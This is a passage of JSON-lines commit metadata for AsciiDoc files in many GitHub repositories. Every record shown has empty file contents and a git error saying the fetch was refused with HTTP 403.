2015-04-29-JVM-Study.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2015-04-29-JVM-Study.adoc","new_file":"_posts\/2015-04-29-JVM-Study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bahamoth\/bahamoth.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8147b75cb7101c6f117772f31f3e75b67fa5001","subject":"Update 2016-03-10-Hub-Press.adoc","message":"Update 2016-03-10-Hub-Press.adoc","repos":"innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io","old_file":"_posts\/2016-03-10-Hub-Press.adoc","new_file":"_posts\/2016-03-10-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-yagasaki\/innovation-yagasaki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce65ddf120239a1606f8dfb9664bd2268ca25c7c","subject":"Update 2017-08-24-Test-Post.adoc","message":"Update 2017-08-24-Test-Post.adoc","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Test-Post.adoc","new_file":"_posts\/2017-08-24-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ambarishpande\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa967ce15afa0dadc1b35eab2e1f94a2d3296f45","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"829b081633e3c42e14144d34129406a61f0409d1","subject":"feat(doc) : create CONTRIBUTING file","message":"feat(doc) : create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8708e06c8ddeeb658852d7179b5e39148ba8c9e3","subject":"Cyber Zombie One Shot","message":"Cyber Zombie One Shot\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3e1ff332f3a5bdb700e2fa1abf2c2e11fe9b19b","subject":"First draft of request api documentation","message":"First draft of request api documentation\n","repos":"tcmitchell\/geni-ch,tcmitchell\/geni-ch","old_file":"docs\/RequestAPI.adoc","new_file":"docs\/RequestAPI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcmitchell\/geni-ch.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"072453de0574c428355e40a88172bc8a9d3f4f2f","subject":"add CNCF.adoc","message":"add CNCF.adoc\n","repos":"jls502\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,jls502\/containerfs","old_file":"CNCF.adoc","new_file":"CNCF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jls502\/containerfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51f4be4b150b824f99ab35f06caba2fe01aab678","subject":"Update 2015-11-01-Enlaces-Utiles-Developer.adoc","message":"Update 2015-11-01-Enlaces-Utiles-Developer.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Enlaces-Utiles-Developer.adoc","new_file":"_posts\/2015-11-01-Enlaces-Utiles-Developer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8f80314354ea50000f1b7889e669a04777f41c2","subject":"Update 2016-07-01-Reading-Between-The-Bits.adoc","message":"Update 2016-07-01-Reading-Between-The-Bits.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9339206766282340f63c6959e75e07897e9453d2","subject":"Update 2015-10-04-Professor-IPTables.adoc","message":"Update 2015-10-04-Professor-IPTables.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-10-04-Professor-IPTables.adoc","new_file":"_posts\/2015-10-04-Professor-IPTables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"508ab241d8f497d04e37ee56e098b69d2d8310cb","subject":"Update 2016-11-07-Sunday-Night-Dream.adoc","message":"Update 2016-11-07-Sunday-Night-Dream.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b1ebc80744062c431ff9ae433f540c0552fa2e7","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a757531c2bc7977892ac50692df32315bf777ea","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"627e6a3ecf1dee8fb9b4a9257f465b2de55f91ac","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1625a15b0ecdcdd5dede201b8531b8cfebd44cef","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d9e5606dc6c04e0c288da1f4d9934c5ad6e0c95","subject":"Update 2017-06-07-Stateless-Component.adoc","message":"Update 2017-06-07-Stateless-Component.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2017-06-07-Stateless-Component.adoc","new_file":"_posts\/2017-06-07-Stateless-Component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b23fe91b1cadabb799a10b73dd250b678e2da613","subject":"Update 2018-01-16-Command-Line-Heroes.adoc","message":"Update 2018-01-16-Command-Line-Heroes.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-01-16-Command-Line-Heroes.adoc","new_file":"_posts\/2018-01-16-Command-Line-Heroes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdaafd7bb721d0725028e624a395560ed22b5940","subject":"Update 2015-07-07-Netrunner.adoc","message":"Update 2015-07-07-Netrunner.adoc","repos":"nullbase\/nullbase.github.io,nullbase\/nullbase.github.io,nullbase\/nullbase.github.io","old_file":"_posts\/2015-07-07-Netrunner.adoc","new_file":"_posts\/2015-07-07-Netrunner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nullbase\/nullbase.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c663448093d91a7e3f511d8117bc1c79dfa4d38c","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3b424e0c574364262f8c0b60e9d2b1516414de7","subject":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, added docs","message":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, added docs\n","repos":"gnodet\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,zregvart\/camel,nicolaferraro\/camel,tadayosi\/camel,pax95\/camel,zregvart\/camel,mcollovati\/camel,tdiesler\/camel,nikhilvibhav\/camel,mcollovati\/camel,adessaigne\/camel,ullgren\/camel,zregvart\/camel,cunningt\/camel,apache\/camel,christophd\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,apache\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,alvinkwekel\/camel,tadayosi\/camel,nicolaferraro\/camel,christophd\/camel,pmoerenhout\/camel,apache\/camel,gnodet\/camel,ullgren\/camel,cunningt\/camel,nikhilvibhav\/camel,DariusX\/camel,christophd\/camel,pmoerenhout\/camel,pmoerenhout\/camel,ullgren\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,cunningt\/camel,DariusX\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,gnodet\/camel,cunningt\/camel,zregvart\/camel,mcollovati\/camel,ullgren\/camel,apache\/camel,DariusX\/camel","old_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6985b4ab89529050c1246d91a870f0ac1e0b0ad","subject":"Update 2015-04-29-GitHub-Pages.adoc","message":"Update 2015-04-29-GitHub-Pages.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-29-GitHub-Pages.adoc","new_file":"_posts\/2015-04-29-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe9e330b8f136699ed3874cde3b45e3bae6d9ef","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c161004876ddf95cfed2555dee4cc4a8bc3c9576","subject":"Delete the file at '_posts\/2016-02-16-All-Important-Context-Maps.adoc'","message":"Delete the file at '_posts\/2016-02-16-All-Important-Context-Maps.adoc'","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d624607d30060cd77caa0cbae8e9d81446f759e","subject":"y2b create post It Wakes You Up With Smell...","message":"y2b create post It Wakes You Up With Smell...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-13-It-Wakes-You-Up-With-Smell.adoc","new_file":"_posts\/2017-03-13-It-Wakes-You-Up-With-Smell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"922cadb27e4724c1df73399cad7cb9c962c6dc62","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd0cf039b57fb246b979b6e989b2131c79050cae","subject":"PLANNER-423 Switch from LaF Metal to Nimbus + move TangoColorFactory, SwingUtils and SwingUncaughtExceptionHandler","message":"PLANNER-423 Switch from LaF Metal to Nimbus + move TangoColorFactory, SwingUtils and SwingUncaughtExceptionHandler\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"adb80c88890b4841e861f8964d69ae391d52015a","subject":"y2b create post Watch Dogs Limited Edition Unboxing \\u0026 Giveaway!","message":"y2b create post Watch Dogs Limited Edition Unboxing \\u0026 Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-05-22-Watch-Dogs-Limited-Edition-Unboxing-u0026-Giveaway.adoc","new_file":"_posts\/2014-05-22-Watch-Dogs-Limited-Edition-Unboxing-u0026-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b2b4bcd1a8f33c378f60e549d96309c288d9602","subject":"Update 2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","message":"Update 2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","new_file":"_posts\/2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46fd33d6890f8f879e3194a8089452e6afbd9718","subject":"Keycloak custom image with Operator","message":"Keycloak custom image with Operator\n","repos":"raehalme\/keycloak,ahus1\/keycloak,stianst\/keycloak,abstractj\/keycloak,thomasdarimont\/keycloak,ahus1\/keycloak,srose\/keycloak,keycloak\/keycloak,mhajas\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,ahus1\/keycloak,reneploetz\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,raehalme\/keycloak,mhajas\/keycloak,ahus1\/keycloak,keycloak\/keycloak,raehalme\/keycloak,keycloak\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,stianst\/keycloak,reneploetz\/keycloak,reneploetz\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,raehalme\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,stianst\/keycloak,srose\/keycloak,raehalme\/keycloak,mhajas\/keycloak,thomasdarimont\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,ahus1\/keycloak,srose\/keycloak,mhajas\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,mhajas\/keycloak,srose\/keycloak,stianst\/keycloak,jpkrohling\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,srose\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak","old_file":"docs\/guides\/src\/main\/operator\/customizing-keycloak.adoc","new_file":"docs\/guides\/src\/main\/operator\/customizing-keycloak.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4dd3f74e9fdab28c69def57a921f4a1052554068","subject":"Update 2015-09-22-Test.adoc","message":"Update 2015-09-22-Test.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-22-Test.adoc","new_file":"_posts\/2015-09-22-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0917afe17d7edef5dfd4717bf8103cca9952596f","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffcf6032f592e05805f5a3a000b380e205781ef2","subject":"adding graph gist","message":"adding graph gist\n","repos":"redapple\/sql2graph","old_file":"examples\/musicbrainz\/musicbrains_gist.adoc","new_file":"examples\/musicbrainz\/musicbrains_gist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redapple\/sql2graph.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6d898942fab6e78b811bf43779e2a4e33171328","subject":"y2b create post Unbox Next - PS3 Headset, Samsung 3D Kit, Catherine Deluxe Edition (PS3), PS3 Wireless Keypad","message":"y2b create post Unbox Next - PS3 Headset, Samsung 3D Kit, Catherine Deluxe Edition (PS3), PS3 Wireless Keypad","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-18-Unbox-Next--PS3-Headset-Samsung-3D-Kit-Catherine-Deluxe-Edition-PS3-PS3-Wireless-Keypad.adoc","new_file":"_posts\/2011-09-18-Unbox-Next--PS3-Headset-Samsung-3D-Kit-Catherine-Deluxe-Edition-PS3-PS3-Wireless-Keypad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"870818d42194b72013f2011dd9083a98e275ce4f","subject":"Update 2018-05-14-command64.adoc","message":"Update 2018-05-14-command64.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-14-command64.adoc","new_file":"_posts\/2018-05-14-command64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e94fb72da974ab550ecd16746f7704dd68879039","subject":"Add 2017-06-20-forge-3.7.1.final.asciidoc","message":"Add 2017-06-20-forge-3.7.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-06-20-forge-3.7.1.final.asciidoc","new_file":"news\/2017-06-20-forge-3.7.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"98f6bd1aa74d75d5711290e54d2c2d6044d620d3","subject":"Update 2016-12-08-My-Development-Environment-setup.adoc","message":"Update 2016-12-08-My-Development-Environment-setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6492dc784357db5b0383ae24bbf0957e046d84d6","subject":"y2b create post The iPhone 7 Plus Spider Edition","message":"y2b create post The iPhone 7 Plus Spider Edition","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-16-The-iPhone-7-Plus-Spider-Edition.adoc","new_file":"_posts\/2017-07-16-The-iPhone-7-Plus-Spider-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b02bf2d955247681b2cb6dd9f7e76579d8ee3c4b","subject":"docs: fix documentation to build on CentOS\/Ubuntu\/SUSE.","message":"docs: fix documentation to build on CentOS\/Ubuntu\/SUSE.\n\nOn RHEL\/CentOS, Debian\/Ubuntu, and SUSE, OpenJDK is required to\nbuild Kudu with CMAKE_BUILD_TYPE=release.\n\nChange-Id: I7a7fcd8510c6ca465b7ba6d9fb39993ce24b29de\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8746\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d7df1436caa15bb4771b443e0d6a5751f6f1f29","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b424df2575b56053b5937080250be4659cbf300f","subject":"Delete the file at '_posts\/2017-03-03-Test-Collab.adoc'","message":"Delete the file at 